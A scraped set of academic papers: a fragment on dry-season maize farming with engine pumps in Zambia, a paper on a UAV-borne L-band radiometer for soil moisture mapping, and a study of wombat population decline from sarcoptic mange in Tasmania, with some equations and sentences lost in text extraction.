As already mentioned, it is easy for those farmers with engine pumps to grow maize (green maize) during the dry season, so easy that they can grow two crops a year. While this is a revo- later. In addition, farmers are working on a trialanderror basis regarding green maize production because it is a relatively new practice with many considerations (e.g., weather conditions, water resource availability, and petrol prices). There are also further risks including attacks on fields and grazing animals eating the maize.
-3 Sale of Crops
According to annual crop sales for engine pump farmers in 2010 ( largescale close to this area, but at a lower elevation. There is no scientific evidence to support a causal relationship between the pump engines and the gardens that are now in disuse.
-4 Production Costs of Tomatoes
One of the farmers offered an alternative reason why the area was no longer used as a garden, one that was not linked to the use of pump engines.
After the liberalization and privatization of the Zambian economy, Zambia is enjoying a copper boom. Since the beginning of the 2000s, the price of copper has skyrocketed worldwide and the agricultural market is expanding in response to a greater demand for domestic agricultural products. Furthermore, President Mwanawasa's "New Deal Policy" remains and still provides more affordable subsidized inputs to farmers.
With regard to the agriculture sector, we can confirm high economic growth and the development of the market economy in rural areas, even though these areas are near to the capital Lusaka. The farmers can now easily purchase farming inputs, such as improved and various seeds, chemical fertilizers, and chemicals, at the small but growing town nearby the village. Agricultural diversification in terms of production is also occurring gradually.
In contrast, the increasing use of expensive inputs may bring about highcost farming and consequently may result in a shortage of funds.
There are three ways to prevent such high demands on available funds : 1) increase the use of farmmade inputs like animal dung instead of using of expensive inputs, for instance fertilizers, 2) use institutional credit like government or NGO assisted and subsidized credit programs, and 3) use private moneylenders. It is important to create new systems, like leverage finance, to multiply gains and losses.
Serious problems will ensue if the income differentials between owners and nonowners, seen for example in land (dambo) ownership and physical capital (engine pumps), continue to grow.
There are signs in the village of the increasing presence of capitalism. For example, it was noted that two people with salaried incomes began to grow maize on a large rented property in the village. They were not traditional farmers and rented the farmland from the villagers. In addition, they hired tractors to plow the maize fields.
Thus, the development of a market economy may produce an unstable rural society. (Accepted, 2014.12.18) | 2019-08-17T08:28:35.226Z | 2015-01-01T00:00:00.000 | {
"year": 2015,
"sha1": "305001ff4b1203f49202ac42132dc6b79c78e7bc",
"oa_license": null,
"oa_url": "https://www.jstage.jst.go.jp/article/tga/66/4/66_255/_pdf",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "5d05bb8a20276739a5e34a830da714e881fa40ad",
"s2fieldsofstudy": [
"Economics",
"Agricultural And Food Sciences"
],
"extfieldsofstudy": [
"Economics"
]
} |
16081205 | pes2o/s2orc | v3-fos-license | Design and first results of an uav-borne L-band radiometer for multiple monitoring purposes. Remote Sens
UAV (unmanned Aerial Vehicle) platforms represent a challenging opportunity for the deployment of a number of remote sensors. These vehicles are a cost-effective option in front of manned aerial vehicles (planes and helicopters), are easy to deploy due to the short runways needed, and they allow users to meet the critical requirements of the spatial and temporal resolutions imposed by the instruments. L-band radiometers are an interesting option for obtaining soil moisture maps over local areas with relatively high spatial resolution for precision agriculture, coastal monitoring, estimation of the risk of fires, flood prevention, etc. This paper presents the design of a light-weight, airborne L-band radiometer for deployment in a small UAV, including the hardware and specific software developed for calibration, geo-referencing, and soil moisture retrieval. First results and soil moisture retrievals from different field experiments are presented.
Introduction
The interest of the scientific community in the remote measurement of geophysical parameters, such as the soil moisture (SM) or the sea surface salinity (SSS), has increased in the last years and much effort has been spent developing research instruments.This has been done mainly by the European Space Agency (ESA), with the MIRAS/SMOS [1], and the National Aeronautics and Space Administration (NASA), with AQUARIUS/SAC-D [2,3] and SMAP [4] missions.These space-borne radiometers have been optimized to measure the aforementioned variables globally, at mesoscale resolution, with short revisit time (~3 days): pixel size is ~100 km for a 0.1 psu SSS accuracy, or the pixel size is ~50 km for a 4% SM accuracy.However, these systems are not adequate for regional or local applications, where higher resolution imagery is required.Airborne microwave radiometers flying at low altitudes can fulfill this lack of information; they can improve the spatial resolution up to tens of meters without virtually any revisit time restrictions.Furthermore, these platforms are less sensitive to atmospheric effects.The SLFMR aboard a Beaver de Havilland [5] and MIRAMAP's radiometers [6] are examples of airborne radiometers.In this context, small unmanned aerial vehicles (UAV) have been found to be the ideal platforms for this kind of remote sensing application [7], because they are easy to deploy, more flexible, and offer a high level of re-configurability.
This work describes a radiometer system that performs soil moisture mapping from low altitude small UAV platforms.The paper is organized as follows: Section 2 presents an introductory overview to the system.Section 3 analyzes the onboard airborne radiometer.The software processor is presented in Section 4; the processor focuses on radiometer calibration, data geo-referencing and representation, data interpolation, and SM retrieval algorithms.Section 5 is devoted to the analyses of soil moisture measurements.Finally, Section 6 summarizes the main conclusions of this paper.
System Description
There are a number of restrictions in the design process for a microwave radiometer and the platform.Assuming their use in precision farming, it is desired to have an absolute accuracy lower than ≈10 K to determine SM with errors lower than 4%.Additionally, a spatial resolution between 30 and 150 m, while flying at altitudes of up to 300 m, is desirable.
The use of UAV platforms to carry remote sensors imposes not only strong constraints on the size, weight, and power consumption of the sensors.Moreover, due to the strong vibrations of the UAV engine induces, an extra effort is required to increase the robustness of the instrument.These vibrations can reach more than 6 g for gasoline engine powered radio-controlled aircrafts, so that special care must be taken in the whole system design process.
The main parts of the system that are deployed in the UAV platform are: the L-band Radiometer, including the antenna, a Global Positioning System (GPS) receiver, an Inertial Motion Unit (GPS-IMU), and the datalogger.Different UAV platforms have been used, all of them with a 2.5 m wingspan and 2 m length (Figure 1).These UAVs are able to fly at altitudes of up to 400 m, with cruise speeds between 25-45 m/s and an endurance of up to 20 min, while carrying a payload of up to 3.5 kg.
The platform is provided with the GPS-IMU for the purpose of geo-referencing the collected radiometric data.The radiometer's output signal, the attitude (roll, pitch, and yaw), the altitude, and the aircraft speed (v x , v y , and v z ) are properly recorded by the onboard data-loggers for later data processing at a sampling rate of 50 samples per second.
Airborne L-band Radiometer
A single polarization nadir-looking Dicke radiometer was selected and implemented, due to its simplicity and sufficient stability when thermally stabilized.The system was designed to require external periodic calibration only at the beginning and end of each flight (≥20 min).
An important issue to take into account is the antenna.The antenna dimensions of the L-band are comparable to the size of the UAV itself if a narrow beamwidth is desired (e.g., less than 25° in both planes).Furthermore, the antenna has to be specifically designed in order to reduce its influence on the UAV aerodynamics, while preserving the desired performance for radiometric applications.The designed antenna (Figure 2a) is a flat hexagonal 7-patch array with a 22° beamwidth in both dimensions [8].The measured gain, directivity, and radiation ohmic efficiency of this antenna are 15.88 dB, 16.03 dB, and 96.5%, respectively.The effect of the variation of antenna ohmic losses, which are due to temperature fluctuations, is minimized by incorporating a thermal control attached to antenna ground plane.
The Airborne RadIomEter at L-band (1.4 GHz) (ARIEL) block diagram is shown in Figure 3.The heterodyne receiver is divided into three main blocks: the RF front-end, the down-converter, and the detection block.The RF front-end (1,400 MHz to 1,427 MHz) includes the Dicke switch, which alternates the detected power between the signal from the antenna and from a matched load.This signal is properly filtered, amplified, and down-converted to a baseband, where it is detected using a true rms-detector (output voltage proportional to signal's standard deviation), followed by a square law amplifier.Finally, the signal is synchronously demodulated, low-pass filtered, and conditioned before the analog to digital conversion process.The radiometric sensitivity ΔT for a balanced Dicke radiometer is [10]: where T REF = 315 K is the physical temperature of the reference load, T REC ≈ 790 K is the receiver's noise temperature, B ≈ 30 MHz is the system's noise bandwidth, and τ is the integration time.
The maximum integration time is determined by the minimum dwell time according to, min min max max where FP min is the smallest footprint, BW is the antenna beamwidth, h min is the minimum flight height, and v max is the maximum flight speed.With these parameters, the theoretical radiometric resolution is ΔT = 1.27K for an integration time of τ = 100 ms.
The radiometer was implemented using commercial "off-the-shelf" components.The radiometer front-end was integrated in a 100 × 60 × 15 mm monoblock box (Figure 4).The total weight, including the batteries, the antenna, and its radome, is less than 3 kg.If the thermal control of the radiometer is included, the total power consumption of the system is less than 10 W, which facilitates the use of light weight Lithium Polymer batteries as the main power supply.
ARIEL Soil Moisture Retrieval Processor
A specific software processor for soil moisture retrieval has been developed to obtain soil moisture maps from the radiometric measurements.The input data files (GPS, IMU, attitude, and raw radiometric data) are selected from a specific graphical user interface (GUI), where the radiometric calibration procedure is defined.This radiometric data calibration procedure is performed before, after, or before and after the flight, according to an established protocol.Figure 5a shows this calibration process.The calibration is based on the selection of the intervals in the raw data where the hot or cold loads were measured.
Two independent dataloggers were used, one for the GPS, and the other for the inertial and radiometric data.To synchronize their data, cross-correlation techniques were used that applied the altitude information from GPS and the barometer (Figure 5b).As shown in Figure 6a, histograms can also be plotted to detect relevant information, such as intervals of interest, and by extracting the desired ranges of antenna temperatures or aircraft height.Interesting parameters to be displayed are the antenna temperature and soil moisture maps in time intervals.The flight trajectory can be illustrated together with the corresponding antenna footprints plotted along the ground track (Figure 6b).The processor includes attitude and altitude filters to limit the range of valid incidence angles, eliminate Sun glints at high banking angles, radio frequency interference (RFI) peaks, or potential recording errors of the dataloggers.Finally, in order to fully cover a specific area (typically 1 km × 1 km) with the UAV flying at low altitudes (under 300 m), the flight plan is designed in such a way that several overpasses at different heights (i.e., with different spatial resolutions) are obtained.In order to merge all the collected information, each footprint has to be properly weighted with the antenna's radiation pattern.Therefore, interpolation techniques have been developed to obtain images with soil moisture or antenna temperature information (Section 4.1.3).These images are then geo-referenced and linked to a map using Keyhole-Mark-up-Language (KML) [11] files that can be superimposed on Google Earth maps for a better interpretation.
Algorithm Description and Procedures
The soil moisture retrieval algorithm proceeds as follows: • Raw data resampling.
• Ground projection of the antenna footprint, taking into account the attitude and position of the platform.• Spatial interpolation.
The algorithm is described step by step in the following sections.
Data Resampling
GPS' largest errors are in the vertical direction.A barometric sensor is used to correct this information, and to refer all heights to ground level, so as to properly compute the antenna footprints.In order to geo-reference the radiometric data, it is necessary to synchronize the barometric altimeter, the GPS, and the radiometric data, since they are acquired at different sampling frequencies and by different dataloggers.The altitude is referenced to the ground's altitude in order to properly compute the antenna footprints.
Radiometric Calibration
The radiometer's raw-data are converted into antenna temperatures through the radiometric calibration.In a Dicke radiometer, the relationship between its output voltage, v o , and the antenna temperature can be expressed as [10]: where T REF is the temperature of the reference load (measured with a thermometer), T A is the antenna temperature, and a and b are gain and offset constants to be determined during the absolute calibration with the hot-cold method [12].A thermally isolated microwave absorber placed just in front of the antenna is used as a hot load, and pointing the antenna to the sky gives the equivalent of a cold load.
In case of temperature drifts during the flight, a linear behavior between two hot or cold load calibrations performed just before and after the flight, is assumed.In this case, the calibrations parameters can be determined as follows: and where t is the time and the subscripts b and f mean before and after the flight.Finally, the time dependent coefficients a(t) and b(t) are used with T REF to compute the calibrated antenna temperature at each sample.In case of the failure of all calibrations, a laboratory calibration with constant coefficients measured in the anechoic chamber can be used.For an integration time of τ = 100 ms, the measured calibration standards have standard deviations of hot σ = 0.0045 V and cold σ = 0.0052 V, which translate into sensitivities of ΔT hot = 0.84 K and ΔT cold = 1.22 K; these values are in agreement with theoretical predictions (Section 3).
Data Merging and Spatial Interpolation
Once the flight trajectory has been determined, the ground projection is performed and the footprint size and shape are determined.Then, the radiometric data has to be properly processed in order to obtain a geocoded SM map that can be linked to a KML file; to be finally overlaid with Google Earth maps.As described before, the data sampling rate is 50 s f = Hz, and the UAV speed is 40 This means that the aircraft has moved 0.8 m between consecutive samples.If an average footprint of 100 m is considered, the pixels have a high-level of overlap, and thus, data must be properly interpolated.
For geo-statistical applications, the Kriging method [13] provides the optimal interpolator.It assigns weights according to a data-driven weighting function (spatial covariance values obtained through a semivariogram).However, for simplicity and computational speed considerations, the algorithm performs an alternative method of assigning a weight to each footprint according to the modified two-dimensional (bivariate) Gaussian density function (GDF) that best fits the antenna pattern mainlobe.Each GDF has been adjusted to ensure that for the 3dB antenna footprint contour, the GDF value falls to the half of the maximum (−3 dB in antenna terms).
Finally, the resulting pixel is the product of a merge of all values from the footprints that intersect a given pixel.Every temperature value of the pixel is obtained from a weighted average of the different looks: where Z k is the value of the k th contributing antenna footprint, ˆi Z is the estimated value for the pixel i th , d k is the distance from the center of the pixel to the center of the k th contributing antenna footprint, GDF k is the GDF of the k th contributing antenna footprint, and n is the total number of contributing footprints.
In this procedure, the footprints generated at lower altitudes will have a higher influence on the obtained pixel.In addition, to ensure nadir look observations, only footprints with incidence angles lower or equal to 10° are computed in the process.This will be further explained in the following section.
Soil Moisture Retrieval
The brightness temperature of the surface is measured by an antenna far away.In this case, the apparent temperature, T AP , is the key parameter that depends on the brightness temperature of the surface under observation (T B ), the atmospheric upward radiation (T UP ), the atmospheric downward radiation scattered and reflected by the surface (T SC ), and the atmospheric attenuation (L a ).The downward radiation is mainly generated by the cosmic radiation level of the sky T ≈ 2.7 K at L -band, and the downwelling atmospheric contribution, T DNatm ≈ 2.1 K, at zenith.These values are fairly constant and will not affect the quality of the measurement, and are thus usually ignored.Since T UP ≈ 0 at low altitudes, T SC is much smaller than the required accuracy and L a ≈ 1 (for 0 θ = °), at low altitudes, the apparent temperature T AP at L-band can be approximated by the temperature emitted by the surface (T B ) weighted by the antenna pattern.
( ) ( ) , n F θ φ is the normalized antenna voltage pattern, Ω p is the equivalent antenna beam solid angle, andθ is the incidence angle.
The brightness temperature T B of a soil covered by vegetation is usually estimated as the contribution of three terms: (i) the radiation from the soil that is attenuated by the overlying vegetation, (ii) the upward radiation from the vegetation, and (iii) the downward radiation from the vegetation, reflected by the soil, and attenuated by the canopy [12]: is the optical thickness, b [m 2 /kg] is a vegetation dependent factor [14], VWC is the vegetation water content [kg/m 2 ], and ω is the single scattering albedo.This formulation is known as the τ-ω model [14] and is based on the single scattering approach proposed in [15].
In the case of bare soil: τ = 0, L veg ≈ 1, and ω = 0 and (7) reduces to ( ) ( ) ( ) where the reflection coefficient at the air-ground interface ( ) Γ is computed using the Wang model [16] as: where Q s is the mixing polarization parameter, and h s is the surface roughness.Both are functions of the frequency.Recent studies have shown that h s also depends on soil moisture [17].In order to retrieve soil moisture from the antenna temperature at a single direction, some assumptions are made: • The soil is bare and smooth (surface roughness parameter h s = 0).
• Only incidence angles smaller than 10° have been retained, since the angular dependence of T B around 0° is weak.
To determine the impact of the incidence angle, the emissivity of a bare flat soil is plotted versus soil moisture for three different incidence angles (θ = 0°, 10°, and 30°; Figure 7a).It could be seen that for incidence angles of up to 10°, the error is smaller than 1% compared with a 0° incidence.For incidence angles up to 30°, the error rises to 6%.In Figure 7b, the impact of vegetation cover is illustrated, showing the emissivity of soil versus SM for two different kinds of soils: bare soil and wheat.Compared with a bare soil, the error is 6% for 22 cm height vegetation and 15% for 60 cm vegetation.These values are obtained with an incidence angle of θ = 0°.
In order to speed up the retrieval process, an emissivity look-up table has been created with SM entries.The scattered radiation is also included for average soil moisture conditions [12].Then, for a given T ph and T A , the SM is readily estimated.
Experimental Results
Three experimental field campaigns have been conducted over different scenarios to retrieve soil moisture maps.The selected scenarios were: (1) Ripollet site surroundings (Barcelona, Spain), used for agricultural applications: land and crop monitoring, with different irrigation levels, (2) Ebro River mouth (Deltebre, Spain), not presented in this work, used for agricultural (rice fields) and coastal applications [18], and (3) REMEDHUS site (Salamanca, Spain), used for SMOS calibration and validation (CAL/VAL) activities [19].
Soil Moisture Measurements at Ripollet Site Surroundings
The Ripollet site surroundings were chosen because the region has a radio control model flying club near agricultural fields.These fields showed interesting changes in soil moisture during the first half of 2009 due to the different irrigation levels during winter and spring.A measured soil moisture map from the Ripollet field is displayed in Figure 8a.The flight corresponds to April 29 (day of year (DoY) = 119), 2009.In situ ground truth measurements were taken with a moisture sensor ECH 2 O EC-5 [20] at a vertical depth of 5 cm.Measurements were performed and two samples averaged.The positions of the soil moisture measurements were geo-coded using a commercial GPS receiver.The soil moisture ground truth (SM-GT) map was spatially interpolated with the same pixel resolution of the retrieved SM map and is shown in Figure 8b. Figure 9 shows an error map of the retrieved soil moisture with ARIEL versus the ground truth measurements.In the upper left part of the error image, the absolute value varies from 6% to 9%.In this zone there is a hill with a 10% slope covered by dense wheat fields.In the center of the image, the error reaches 1%.There are two noticeable regions (shown in red) where the error reaches up to 16%.One region corresponds to the aircraft runway made of concrete, and the other is covered by tall vegetation (3 m height cane).
Figure 9.
Retrieved soil moisture error map with ARIEL compared to ground truth measurements.In the center of the image, the absolute error reaches 1% and rises up to 9% in the upper left (data cursor value is 8.27%).Two noticeable zones (red and yellow), where the error reaches up to 16%, are the runway and a tall vegetation area (3 m height cane).
Soil Moisture Retrieval Tests at the Remedhus, SMOS Cal/Val Site Zamora, Spain
GRAJO (GPS and Radiometric Joint Observations) is a joint initiative between UPC and the Centro Hispano Luso de Investigaciones Agrarias (CIALE)/Universidad de Salamanca (USAL).The CIALE group is in charge of the in situ measurements using TDR and Hydra Probes automatic sensors [21] in order to obtain, simultaneously, soil moisture and temperature at 5, 25, and 50 cm depths.UPC is in charge of the radiometric and the GPS reflectometer data acquisitions.
The GRAJO field campaigns in support to the SMOS calibration or validation have been carried out in Vadillo de la Guareña, Zamora, Spain from November 2008 until May 2010 [19].
The objectives of GRAJO are threefold: • To validate and calibrate the SMOS-derived soil moisture map, at SMOS pixel-size levels.
• To study the variability of soil moisture within the SMOS footprint.
• To test pixel disaggregation techniques development in order to improve the spatial resolution of SMOS observations.These algorithms have been tested using airborne radiometric measurements over REMEDHUS acquired with the ARIEL radiometer.
The experiment with ARIEL at the REMEDHUS test site was planned to be performed over this very heterogeneous area, where the measured SM has variations from 2 to 50% in a 2 km 2 area.These conditions allowed one to validate the SM retrieval algorithm over those different kinds of terrains and SM values.The method's feasibility could be tested thanks to the information from a ground-truth SM map provided by CIALE.
Figure 10 shows a land use map of the area where four kinds of soil can be distinguished: cereal, vineyard, human-made buildings, and rangeland.There are also rural ways, trees, and a creek.This kind of land use implies a high degree of variability of the SM with abrupt changes.Flight measurements were carried out in the morning right after sunrise and in the evening right before sunset in order to reduce the effect of Sun interferences (due to reflections over the terrain).The retrieved soil moisture maps from the two flights are plotted in Figure 11a.Figure 11b shows the soil moisture ground truth map obtained by the CIALE/USAL team, which has been generated using Kriging interpolation techniques.The ground truth maps show variations in SM from 2% to almost 50%.Since the experiment was carried out in a very heterogeneous area, the most homogeneous zones with lower variations in the SM (up to 15%) are analyzed first.Figure 12a shows the error map between the retrieved SM map from flight 1 (Figure 11a) and the ground truth measurements (Figure 11b) of part of the scenario (center of Figure 11a).The ground truth showed a variation of SM from 25 to 40%, and the obtained error map (difference between retrieved SM and ground truth in %) goes from 1 to 6%.The same results are obtained in other parts of the scenario.Figure 12b shows the error map of the left part of the scenario with information retrieved from second flight.The same results are obtained in this flight.Figure 13a shows the error map in the complete image.It is easy to see that this absolute error increases at the corners of the area from 12% up to 20% due to the substantial reduction in the number of overpasses.It must be pointed out that some areas showed variations in SM from 4% to 46% at distances closer than 70 m.These areas have been interpolated by the radiometer if a footprint of 100 m is observed that implies a large error in the retrieved SM value.
Figure 13b represents the error map in the complete image from the second flight.There are two zones in the center of the image where the error reaches 20%, for which some considerations must be taken into account.The flight was performed in the afternoon, and the ground truth map was taken in the morning simultaneously with the first flight so that in this zone, the variability in SM is higher due to the drying.One limitation of generating ground truth maps with interpolation methods is the variability of SM values in short distances.A source of error in the ground truth information is that of the accuracy of the sensor, which in this case is 1.5% [21].To better understand these large differences, biophysical parameters of the vegetation present in the site are provided in Table 1.The VWC was determined during the measurement, and the normalized difference vegetation index (NDVI) was measured with a USB4000 miniature fiber optic spectrometer from ocean optics.10, the best results in the first flight were obtained over unproductive areas (bare soil or poor vegetation).The average errors were obtained over grass or pasture zones where higher vegetation indices were present.
The largest errors are obtained in the vineyard area.Despite its low vegetation index and poor water content, this area has a particular orography, with a 10% slope and a road (without ground truth information) that separates a very dense grass zone from the vineyard.Furthermore, this part of the scenario was not well covered during the flight; thus, few footprints contributed to the pixels.
In the second flight, the biggest errors are present over cereal zones where a high vegetation index is present.The same performance occurs over the roads where it is not possible to have ground truth information.
Other noticeable artifact in the image of Figure 11a is an apparent circular feature of the SM retrieved maps.It occurs in the zones where few over flights were performed, which means that few samples contribute to the pixel generation and the antenna footprint is depicted.
Conclusions
This work has presented the design and development of an airborne light weight radiometer at L-band (ARIEL).It also presents the software processor that includes different calibration techniques and interpolation and merging techniques.These techniques allow immediate processing of the data just at the end of the flight.
The flexibility of the UAV system has been applied for soil moisture mapping in cereal and vineyard fields located in the REMEDHUS SMOS CAL/VAL site.Results show that geo-referenced Google Earth maps of soil moisture and brightness temperature maps were obtained with estimated absolute errors between 1% and 6%.These results were obtained at homogeneous zones in agricultural fields.
The experimental tests planned in heterogeneous and vegetation covered soils show large errors where abrupt changes in SM are present and Krigging interpolation is prone to larger errors.The best results are obtained over more homogeneous zones, and the best image quality is achieved over the zones in which more overflights were performed.Some improvements on the system are planned in order to increase the resolution.Also, a unique GPS-IMU unit will be included to avoid data resampling.
Figure 1 .
Figure 1.The UAV during a test flight.The ARIEL antenna is located below the fuselage.
Figure 2 .
Figure 2. (a) Setup for the antenna pattern measurement showing the antenna mounted on the UAV at the anechoic chamber of the Dept. of Signal Theory and Communications, Universitat Politècnica de Catalunya [9].(b) Measured full radiation pattern.(c) Simulated and measured copolar radiation pattern at the E-plane.Simulation only considered ideal isotropic radiation elements, and thus, slight differences between simulated and measured results can be distinguished.(d) Measured cross-polar radiation pattern for the E-plane.
Figure 4 .
Figure 4. ARIEL RF front end 100 × 60 × 20 mm compared to the size of a 1 euro coin.
Figure 5 .
Figure 5. Data processing (a) Calibration of radiometer output (selection of calibration intervals), (b) Synchronization of the altitude data from GPS data and the barometric information data synchronization.
Figure 6 .
Figure 6.Images showing the kind of target present in the scene.Test performed in a coastal zone.(a) Histogram plot in which different targets and other signals could be distinguished during the measurement: soil, water, calibration, and sun glints.(b) Trajectory plot of the flight superimposed with brightness temperatures.
[
the bare soil emissivity, Г is the reflection coefficient, p is the polarization, T veg and T soil are the physical temperatures of the vegetation and soil, respectively, exp( sec ) Np] is the attenuation due to the vegetation cover, b VWC τ = ×
Figure 10 .
Figure 10.Land use map for the experiment in Vadillo de la Guareña (Zamora, Spain).
Figure 12 .
Figure 12.Error maps for the homogeneous zone from the retrieved SM versus ground truth measurements of (a) flight 1, and (b) flight 2.
Figure 13 .
Figure 13.Error maps for the full areas from retrieved SM versus ground truth measurements of (a) flight 1, and (b) flight 2. The dark blue points show the locations of the ground truth measurements.
Table 1 .
Biophysical parameters of the vegetation present in Vadillo de la Guareña (Zamora, Spain), March 25 (DoY = 84), 2009.Based on Table1information, and on the land use map of Figure | 2014-10-01T00:00:00.000Z | 2010-06-29T00:00:00.000 | {
"year": 2010,
"sha1": "a3408d2ec113c88aba76b4f70657c22aee47891e",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2072-4292/2/7/1662/pdf?version=1403129183",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "a3408d2ec113c88aba76b4f70657c22aee47891e",
"s2fieldsofstudy": [
"Agricultural and Food Sciences",
"Engineering",
"Environmental Science"
],
"extfieldsofstudy": [
"Geology",
"Computer Science"
]
} |
261065396 | pes2o/s2orc | v3-fos-license | Density independent decline from an environmentally transmitted parasite
Invasive environmentally transmitted parasites have the potential to cause declines in host populations independent of host density, but this is rarely characterized in naturally occurring populations. We investigated (1) epidemiological features of a declining bare-nosed wombat (Vombatus ursinus) population in central Tasmania owing to a sarcoptic mange (agent Sarcoptes scabiei) outbreak, and (2) reviewed all longitudinal wombat–mange studies to improve our understanding of when host population declines may occur. Over a 7-year period, the wombat population declined 80% (95% CI 77–86%) and experienced a 55% range contraction. The average apparent prevalence of mange was high 27% (95% CI 21–34), increased slightly over our study period, and the population decline continued unabated, independent of declining host abundance. Combined with other longitudinal studies, our research indicated wombat populations may be at risk of decline when apparent prevalence exceeds 25%. This empirical study supports the capacity of environmentally transmitted parasites to cause density independent host population declines and suggests prevalence limits may be an indicator of impending decline-causing epizootics in bare-nosed wombats. This research is the first to test effects of density in mange epizootics where transmission is environmental and may provide a guide for when apparent prevalence indicates a local conservation threat.
Introduction
Invasive pathogens cause substantive impacts on wildlife populations and can have long-term consequences for population trajectories [1].Theory often suggests host density plays an important role in disease outbreaks and population declines (density dependence), particularly for directly transmitted pathogens [2].Hence, as a host population declines, pathogen prevalence may also gradually decline in accordance with diminished host contacts and the pathogen-specific time between infection and mortality.However, theory also suggests declines may occur independent of density where pathogen transmission is environmental [3][4][5]-that arising from free-living pathogen stages able to persist for lengths of time independent of the host and cause infection on host contact with fomites [6].Hence, as host density declines, host encounter rates with fomites may remain unimpacted, meaning prevalence of disease remains high and a disease outbreak continues unabated [5].In extreme cases, near or complete extirpation of host populations can result because of environmental transmission [7].However, empirical examinations of density independence of environmentally transmitted pathogens are rare in naturally occurring populations.
Among the most invasive and impactful of mammalian parasites is the astigmatic mite Sarcoptes scabiei, which causes sarcoptic mange (termed scabies in humans) [1,8].The parasite was dispersed associated with European colonialism and now forms a globally invasive panzootic (documented to infect at least 148 mammal species) [8].Depending on host species S. scabiei has emerged or is emerging, with transmission spanning direct to environmental modes [9].Where S. scabiei has emerged and become established, post-invasion epidemiological dynamics are variable, including endemic disease and outbreaks that cause local declines and extirpations [10,11].Host density is often proposed as causally associated with S. scabiei induced population declines [10,[12][13][14][15].However, given variable transmission modes, declines may also occur independent of host density where transmission is dominated by environmental fomites.Density independent dynamics of environmentally transmitted S. scabiei are yet to be assessed for any host species.
Bare-nosed wombats (Vombatus ursinus) typify complex post-invasion dynamics of a virulent pathogen.Bare nosed wombats are large fossorial marsupial herbivores that are non-territorial, live largely solitary lives (meaning direct contacts are rare outside of mating), and share burrows asynchronously owing to burrow switching every 1-9 days [16,17].Sarcoptes scabiei was introduced to Australia by Europeans and their domestic animals (likely multiple times since the late 1700s), with records of infection in wombats dating back over a century [18,19].Sarcoptic mange is the most important disease affecting bare-nosed wombats, killing individuals it infects [20,21].Exposure to S. scabiei occurs in burrows [22], with environmental transmission driven by burrow switching behaviours [17], which theory suggests it may or may not be linked with local density (based on above ground population counts [10]).Evidence suggests bare-nosed wombat populations predominantly sustain S. scabiei independent of other mammals [7], populations often persist in the presence of mange, and can also become disease free [10,23].However, outbreaks driving gradual declines also occur [7], and epidemiological features associated with declines are rarely understood.
We describe a declining wombat population owing to sarcoptic mange and evaluate evidence of density independence and range contraction.We then compile and contrast all published literature on longitudinal wombat population studies where mange disease is reported, and examine if limits exist between mange and wombat population trajectories.Collectively, we characterize epidemiological features associated with variable post-invasion host-pathogen dynamics of an environmentally transmitted parasite.
Material and methods (a) Study site and surveys
This research was undertaken on private property in the central Tasmanian highlands (average elevation 650 m.a.s.l.).The site is characterized by highland Poa grassland, partially modified by stock grazing, surrounded by Eucalyptus dalrympleana, E. pauciflora and E. delegatensis dry forest and woodland [24].Following detection of wombats showing signs of mange disease in 2014, surveys commenced in 2015 and were conducted through to 2022, with a gap in surveys between 2018 and 2020.Occurrence of mange disease at the site prior to 2014 is unreported, suggesting it was either absent or at low prevalence.
We undertook 29 survey trips, with most lasting 2-3 survey days to record counts of wombats and wombats with mange within our study area.Three surveys lasted 1 day and one lasted 4 days.On each occasion surveys of wombats and their signs of mange were undertaken by observation using established methods [7,25].Briefly, surveys were conducted from late afternoon to dusk, walking a 4.4 km transect.Each observed wombat was assessed for clinical signs of mange (characteristic patterns of alopecia and hyperkeratosis [25]) using 10 × 42 magnification binoculars.For each observation, the location of the wombat and their mange status was recorded.In instances where the wombat fled or disappeared down a burrow before a mange assessment could be made, its location was recorded, but mange status was listed as unknown.Survey frequency varied across the 8-year study period, being most frequent in 2016 and 2020-2022, and can are broadly grouped into two defined time periods: 2015-2018 and 2020-2022.
In addition to dusk surveys, to ensure robust confirmation of population decline, we made efforts to survey wombats during the day (cooler temperatures at the site's elevation means wombats are often out during the day) and at a night by spotlight.As these additional surveys did not impact study findings and there was no perceivable overlap in counted individuals, all surveys on a given day were combined.We stress that wombat counts are necessarily an index of true population size, and counts have been shown to correlate among survey methods, suggesting they are representative [26].
We explicitly use the term 'apparent prevalence' to describe the relative proportion of the wombat population showing signs of sarcoptic mange.Diagnosis of S. scabiei infection is based on visual signs of disease (mainly alopecia and hyperkeratosis) that have been verified against other clinical diagnostic techniques [27].Visual diagnosis of early stage S. scabiei infection is inherently variable, so estimates of mange prevalence are likely conservative in most instances [27].
Finally, we compiled all studies reporting longitudinal surveys of wombats and where mange disease was also reported, extracted study location, duration, number of wombats observed and apparent prevalence of mange.This evaluation of literature was undertaken to assess if there was any relationship between the apparent prevalence and wombat population trajectories.
(b) Statistical analyses
All analyses were undertaken in R v. 4.0.3 using the 'stats', 'rio', 'lubridate', 'stats4 0 , 'arm','lme4, 'adehabitatHR', 'rgda' and 'sp' packages.Wombat data were used as wombats observed per survey day to account for minor variation in the number of surveys in a given day and because the same transect (4.4 km) was repeated.A generalized linear mixed model (GLMM) was used to evaluate changes in wombat abundance (our response variable) with time period (2015-2018 versus 2020-2022) and apparent prevalence of mange as predictor variables, and survey trip as a random effect.We excluded date from this analysis as it was confounded with time period, and the analytical outcomes were consistent.We additionally investigated whether the probability of a wombat being assigned as mange positive changed between the time periods using a GLMM with a binomial error distribution and survey trip as the random effect.For readers who prefer to see prevalence as the response variable, we also provide data and analyses in this representation (electronic supplementary material, S1) Finally, we investigated if the distribution of wombats shifted between the two time periods by calculating and comparing the 100% minimum convex polygon (MCP) around wombat observation points in 2015-2018 versus 2020-2022.In preliminary analyses we considered a range of MCP sizes (100%, 90%, 80%, 70%) finding the same general conclusion was reached regardless (electronic supplementary material, S2).
The decline in the average number of wombats per survey was associated with time period (2015-2018 versus 2020-2022) and was unrelated to the apparent prevalence of mange (figure 1, Gaussian GLMM: time-period F = 9.83, p = 0.004; prevalence F = 2.41, p = 0.122).Notably, the probability of a wombat being assigned as sarcoptic mange positive did not decline as the number of wombats per survey reduced between the time periods, but rather increased (binomial GLMM: time-period z = 2.16, p = 0.031).The distribution of wombats in the study area also contracted between the two study periods (figure 2).Proportional range contraction was estimated at 54.9%, based on a 100% MCP of 7.4 km 2 in 2015-2018 to 4.5 km 2 in 2020-2022.Range contraction was supported regardless of MCP size (electronic supplementary material, S2).
